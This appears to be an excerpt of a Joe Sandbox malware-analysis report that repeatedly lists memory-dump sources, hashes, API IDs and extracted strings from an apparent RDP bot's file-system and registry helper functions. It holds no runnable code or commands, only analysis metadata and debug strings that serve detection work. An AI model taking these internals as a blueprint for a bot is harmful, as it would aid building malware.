                                                                    • Instruction ID: 7cd4d3caac4682b09b31eba07a3fff94969e6e1d76416c4d58677b2028b81500
                                                                    • Opcode Fuzzy Hash: eddfeba3403210edebded81f2e7352dbb37a411731a4da1b037d3eac54097d24
                                                                    • Instruction Fuzzy Hash: 21D05E83E9DAC24DF2671A354C211192E905BB2B24B8E80BAE67C4A3D3A94C58008159
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 878cbef4255dd2cc40c8794ab988d36fae64f11de0d4cbe0de4badab2383d5c2
                                                                    • Instruction ID: 55fae2c35ec52b9f870276e371434b4526adf686ec48c5474e14a27da727ebf6
                                                                    • Opcode Fuzzy Hash: 878cbef4255dd2cc40c8794ab988d36fae64f11de0d4cbe0de4badab2383d5c2
                                                                    • Instruction Fuzzy Hash: 76D06787D1D7C54AE3235B30AC2562A2F6427B3A00F4A81BBC2C5922B3E94C9405D222
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c33678ac6d6b965f8c2d1d0dbee46628573a7ddd3699daee88d98715a5436f6
                                                                    • Instruction ID: 8275f39a3b046a8bad7e65e3f52feddcd1c461ba834e3d1ef98d6087dcaaf37c
                                                                    • Opcode Fuzzy Hash: 7c33678ac6d6b965f8c2d1d0dbee46628573a7ddd3699daee88d98715a5436f6
                                                                    • Instruction Fuzzy Hash: 3AA0025388DC03C4D2140B05E8421F05168DF16310B483074D46D615668A6C90D54108
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$fclosefflushfopenfseekfwrite
                                                                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                                    • API String ID: 2897271634-4162578512
                                                                    • Opcode ID: c9279b854dfb0ac51801ff11442172d9d1f40f0b26c50527cfb45b4dd190f3f2
                                                                    • Instruction ID: ed5dfb280b053420054dd9b49e9113dc98f693abe6a475fff1cd069ef31f6d33
                                                                    • Opcode Fuzzy Hash: c9279b854dfb0ac51801ff11442172d9d1f40f0b26c50527cfb45b4dd190f3f2
                                                                    • Instruction Fuzzy Hash: 12D18F62A09E0391FB119B97E8403BC33AAAF457B4F6550BAC90E472B5EF7CE545C320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$fclosefflushfopenfseekfwrite
                                                                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                                    • API String ID: 2897271634-4162578512
                                                                    • Opcode ID: 6c49b3629cd02253d251ce2eab44823ce8ffdbd5eb257f9aa9dd2471269a804c
                                                                    • Instruction ID: 8d31f8efc4042a532761e2edd65b96efd974ac871e1683e5c4b70c3cbd41b50e
                                                                    • Opcode Fuzzy Hash: 6c49b3629cd02253d251ce2eab44823ce8ffdbd5eb257f9aa9dd2471269a804c
                                                                    • Instruction Fuzzy Hash: 80D15D62A09E43C9FB109B57E8447BE2761AF707B4F4441B2D92E672B6DE3CE5468308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                                                                    • String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                                                    • API String ID: 2460052984-812936415
                                                                    • Opcode ID: 13c90eca25d72b710558757fa98cc21ff6602da817c3a228f9be9adc5a6d1a88
                                                                    • Instruction ID: 9db69c19efba3b3e6e7a6dbbb2dfe9a1876f2358a4a9d24447e345feeea3f96a
                                                                    • Opcode Fuzzy Hash: 13c90eca25d72b710558757fa98cc21ff6602da817c3a228f9be9adc5a6d1a88
                                                                    • Instruction Fuzzy Hash: C2A1F6A1A0CE8385FB209B8794403FD639AAF813A4FB440B6D94E476B5EF7CE585C711
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                                                                    • String ID: (path != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                                                    • API String ID: 2460052984-812936415
                                                                    • Opcode ID: 986671ed0631494871180cb31f5135f74694f96708304563f1cb51abeca53433
                                                                    • Instruction ID: cb5877846d885101dbadcfdfb94d2ea9b0141a78e1e6cd8c68cb2005a7ce202e
                                                                    • Opcode Fuzzy Hash: 986671ed0631494871180cb31f5135f74694f96708304563f1cb51abeca53433
                                                                    • Instruction Fuzzy Hash: AEA1B161A0CE828DFB209B57A5443FD6351AFA13A4F9400B2C56D776B6DF3CE6458B08
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$strcatstrcpy$strcmp$strstr
                                                                    • String ID: (dst != NULL)$(src != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                                                    • API String ID: 1797803443-1088979775
                                                                    • Opcode ID: 17b4f4cd293368b3ba9d7eed677e36c580ad60b789d88699f5b4c5df2e77724e
                                                                    • Instruction ID: 9e61b0f8751c31a3f4a902b4ace137e5842ca8663dc7613f9140b23dbf5e4282
                                                                    • Opcode Fuzzy Hash: 17b4f4cd293368b3ba9d7eed677e36c580ad60b789d88699f5b4c5df2e77724e
                                                                    • Instruction Fuzzy Hash: CCC1D661A0CE82D9F620C703D5443FE5751ABA53A4F8401B2DA7D376A6DF3DE606CB09
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$strcatstrcpy$strcmp
                                                                    • String ID: (dst != NULL)$(src != NULL)$*$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                                                    • API String ID: 2140730755-1088979775
                                                                    • Opcode ID: a99da4092a415f809d1f114e9a415d6de03a6565f4b24626f2fe8f52248e582f
                                                                    • Instruction ID: be55bfbe1e2c8674475eeec30c603bc8956872870e31d9f2e25aa27c3c725d54
                                                                    • Opcode Fuzzy Hash: a99da4092a415f809d1f114e9a415d6de03a6565f4b24626f2fe8f52248e582f
                                                                    • Instruction Fuzzy Hash: 69C1C3A190CE8391FB218B96D5403FE635AAF853A4F9400BAD98D076F9DF7CE506C701
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$CloseCreateHandleLock
                                                                    • String ID: $ $(lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$~$~
                                                                    • API String ID: 2747014929-2799703827
                                                                    • Opcode ID: 25a7fe5d7874ff3a3410145151dd17bc483f106532e2dff5e3268f45a7a8a479
                                                                    • Instruction ID: 3df976c8468cab06a0a502c9cebbb07bc8a97dea5e9ffb082d01eee00386fce6
                                                                    • Opcode Fuzzy Hash: 25a7fe5d7874ff3a3410145151dd17bc483f106532e2dff5e3268f45a7a8a479
                                                                    • Instruction Fuzzy Hash: A3814850E0CF4B81F7716B96A84037C32595F01778F5441BACAAE066F5FF6DAA85D302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$CloseCreateHandleLock
                                                                    • String ID: $ $(lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$~$~
                                                                    • API String ID: 2747014929-2799703827
                                                                    • Opcode ID: efa6e9aefb3721e4e3d1491ec1bfe1554772be8d283f27de0c005768d19bb3ee
                                                                    • Instruction ID: 654a581f98918f7505fa09e4d992ed166560a1ddd8ebb57996302293193961b5
                                                                    • Opcode Fuzzy Hash: efa6e9aefb3721e4e3d1491ec1bfe1554772be8d283f27de0c005768d19bb3ee
                                                                    • Instruction Fuzzy Hash: 2A815370E0CF4BC9FA349B56A4443BC22505F30374F5416B2CA7E2A6F2EE6DA985930D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenValuefflushfwrite
                                                                    • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 716145365-253406552
                                                                    • Opcode ID: 56fd55c88b47a3bd48f6e474e1f48b8e0d98417949632ee02a8fd53b650c90ad
                                                                    • Instruction ID: 255e0b0e58b130f0e1d39dac6f62ad337f7d511021b48c7dd126392b89a37172
                                                                    • Opcode Fuzzy Hash: 56fd55c88b47a3bd48f6e474e1f48b8e0d98417949632ee02a8fd53b650c90ad
                                                                    • Instruction Fuzzy Hash: 66818F7190CF1B81FB30AB87A9403BD3269EF447A4F6401BAD95D466B5EE2DE984D302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenValuefflushfwrite
                                                                    • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                    • API String ID: 716145365-253406552
                                                                    • Opcode ID: dd6bf0ddd905deb28ef1524b925eb8f8d19467bfd533ff707fcc3a22a463325f
                                                                    • Instruction ID: a29522333a937f44595bcdfe84d02a06c76cd8a445f2754da1f75ed8c7a8b872
                                                                    • Opcode Fuzzy Hash: dd6bf0ddd905deb28ef1524b925eb8f8d19467bfd533ff707fcc3a22a463325f
                                                                    • Instruction Fuzzy Hash: 59816261A0CF4BCDFA30A716A94037D7A50AF30774E0401B2D97D6A6B7EE5DE985830E
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteOpenValuefflushfwrite
                                                                    • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 3240087161-1648311886
                                                                    • Opcode ID: 25a7ebb25baff321afba265dbb17ffd66978b20602fb46e2baa317a3d327f89e
                                                                    • Instruction ID: f1cb6b8e191b2a395cc1fe63c268d36b65fdd2632a497d40aa93a8e23fab2787
                                                                    • Opcode Fuzzy Hash: 25a7ebb25baff321afba265dbb17ffd66978b20602fb46e2baa317a3d327f89e
                                                                    • Instruction Fuzzy Hash: 4E817B6290CF0B85FB70AB87A84037C726DBF507A4F5401BAC91E466B5EE6DAD84C302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteOpenValuefflushfwrite
                                                                    • String ID: $ $ $ $(key != NULL)$(root != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                    • API String ID: 3240087161-1648311886
                                                                    • Opcode ID: 9696ecc43d2f276dee9d8872b0da1a51c060c652e9af9cabf5f55fd6ed35039c
                                                                    • Instruction ID: cc1c71059ed1ab6db5b6de191674ca371dfae4d3fbfaae4b89351a10c6152510
                                                                    • Opcode Fuzzy Hash: 9696ecc43d2f276dee9d8872b0da1a51c060c652e9af9cabf5f55fd6ed35039c
                                                                    • Instruction Fuzzy Hash: 6181546090CF0BDDFA30AB56A84027D7A50AF70774F4401B2D97E6B6B6EE1DE985830D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
